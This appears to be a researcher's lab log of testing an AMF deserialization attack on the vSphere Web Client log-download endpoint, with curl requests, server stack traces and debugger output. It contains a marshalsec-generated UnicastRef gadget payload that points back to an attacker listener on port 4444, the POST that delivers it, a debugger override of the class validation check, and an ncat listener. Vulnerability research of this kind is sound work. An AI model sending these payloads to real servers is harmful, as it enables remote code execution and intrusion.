< Set-Cookie: JSESSIONID=1488241428F4AE1E7A8175ACAD6A276F; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2920
< Date: Sat, 04 Dec 2021 01:02:59 GMT
< Connection: close
< Server: Anonymous
<



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <style type="text/css" media="screen">
         html {
            background: #3075ab; /* Old browsers */
            background: -moz-linear-gradient(top,  #3a8dc8 0%, #183a62 100%); /* FF3.6+ */
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */
            background: -webkit-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */
            background: -o-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */
            background: -ms-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* IE10+ */
            background: linear-gradient(to bottom,  #3a8dc8 0%,#183a62 100%); /* W3C */
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */
            background-repeat: no-repeat;

            height: 100%;
            overflow: auto;
            margin: 0;
            padding: 0;
         }

         #errorAreaWrapper {
            position: relative;
            float: left;
            left: 50%;
            margin-top: 30px;
         }

         #errorArea {
            position: relative;
            float: left;
            left: -50%;
            padding: 15px;
            background-color: white;
            font-size: 14px;
            color: #000000;
            font-family: Georgia, Arial, Helvetica, sans-serif;
            border: 1px solid black;
         }

         #errorImage {
            border: 0;
            margin-right: 10px;
            display: inline-block;
            vertical-align: top;
         }

         #errorAllText {
            display: inline-block;
            vertical-align: top;
            min-width: 500px;
            max-width: 700px;
         }

         #errorSorry {
            font-weight: bold;
         }

         #errorMessage {
            padding-top: 10px;
            padding-bottom: 10px;
         }

         #errorCheckLog {
            font-style: italic;
         }
      </style>
   </head>
   <body>
      <div id="errorAreaWrapper">
        <div id="errorArea">
          <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
          <div id="errorAllText">
             <div id="errorSorry">A server error occurred.</div>
             <div id="errorMessage">Unknown AMF type '65'.</div>
             <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
          </div>
        </div>
      </div>
   </body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$

[2021-12-04T01:02:59.500Z] [WARN ] http-nio-9090-exec-7         70000069 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController         ClientId is null.
[2021-12-04T01:02:59.507Z] [ERROR] http-nio-9090-exec-7          o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager]       Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.UnknownTypeException: Unknown AMF type '65'.] with root cause flex.messaging.io.UnknownTypeException: Unknown AMF type '65'.
	at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:232)
	at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201)
	at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428)
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214)
	at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177)
	at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347)
	at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
	at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764)
	at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33)
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

Testing AMF deserialization using the `UnicastRef` gadget

root@895ea1dbdd95:~/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 UnicastRef 172.16.57.1 4444 | base64 -w 0 | xargs

Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA=
root@895ea1dbdd95:~/marshalsec#

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 133
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
< Set-Cookie: JSESSIONID=FCDFEC1FA6DBC64A0638002A142EB766; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2963
< Date: Sat, 04 Dec 2021 01:04:57 GMT
< Connection: close
< Server: Anonymous
<



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <style type="text/css" media="screen">
         html {
            background: #3075ab; /* Old browsers */
            background: -moz-linear-gradient(top,  #3a8dc8 0%, #183a62 100%); /* FF3.6+ */
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */
            background: -webkit-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */
            background: -o-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */
            background: -ms-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* IE10+ */
            background: linear-gradient(to bottom,  #3a8dc8 0%,#183a62 100%); /* W3C */
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */
            background-repeat: no-repeat;

            height: 100%;
            overflow: auto;
            margin: 0;
            padding: 0;
         }

         #errorAreaWrapper {
            position: relative;
            float: left;
            left: 50%;
            margin-top: 30px;
         }

         #errorArea {
            position: relative;
            float: left;
            left: -50%;
            padding: 15px;
            background-color: white;
            font-size: 14px;
            color: #000000;
            font-family: Georgia, Arial, Helvetica, sans-serif;
            border: 1px solid black;
         }

         #errorImage {
            border: 0;
            margin-right: 10px;
            display: inline-block;
            vertical-align: top;
         }

         #errorAllText {
            display: inline-block;
            vertical-align: top;
            min-width: 500px;
            max-width: 700px;
         }

         #errorSorry {
            font-weight: bold;
         }

         #errorMessage {
            padding-top: 10px;
            padding-bottom: 10px;
         }

         #errorCheckLog {
            font-style: italic;
         }
      </style>
   </head>
   <body>
      <div id="errorAreaWrapper">
        <div id="errorArea">
          <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
          <div id="errorAllText">
             <div id="errorSorry">A server error occurred.</div>
             <div id="errorMessage">Creation validation for class 'sun.rmi.server.UnicastRef' failed.</div>
             <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
          </div>
        </div>
      </div>
   </body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$

[2021-12-04T01:04:48.349Z] [WARN ] http-nio-9090-exec-1         70000071 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController         ClientId is null.
[2021-12-04T01:04:48.353Z] [WARN ] http-nio-9090-exec-1         70000071 ###### ###### c.vmware.vise.messaging.validators.ClassDeserializationValidator  Deserialization skipped for type sun.rmi.server.UnicastRef
[2021-12-04T01:04:57.329Z] [ERROR] http-nio-9090-exec-1          o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager]       Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed.] with root cause flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed.
	at flex.messaging.util.ClassUtil.validateCreation(ClassUtil.java:354)
	at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:115)
	at flex.messaging.io.AbstractProxy.createInstanceFromClassName(AbstractProxy.java:95)
	at flex.messaging.io.AbstractProxy.createInstance(AbstractProxy.java:115)
	at flex.messaging.io.amf.AbstractAmfInput.createObjectInstance(AbstractAmfInput.java:169)
	at flex.messaging.io.amf.Amf3Input.readScriptObject(Amf3Input.java:748)
	at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:156)
	at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201)
	at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428)
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214)
	at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177)
	at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347)
	at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
	at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764)
	at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33)
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

Testing RCE by forcing it in a debugger, lol

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 133
> Content-Type: application/x-www-form-urlencoded
>

Breakpoint hit: "thread=http-nio-9090-exec-10", flex.messaging.util.ClassUtil.validateCreation(), line=351 bci=76
351        if (!valid) {

http-nio-9090-exec-10[1] print valid
 valid = false
http-nio-9090-exec-10[1] set valid = true
 valid = true = true
http-nio-9090-exec-10[1] cont
>

wvu@kharak:~$ ncat -lkv 4444
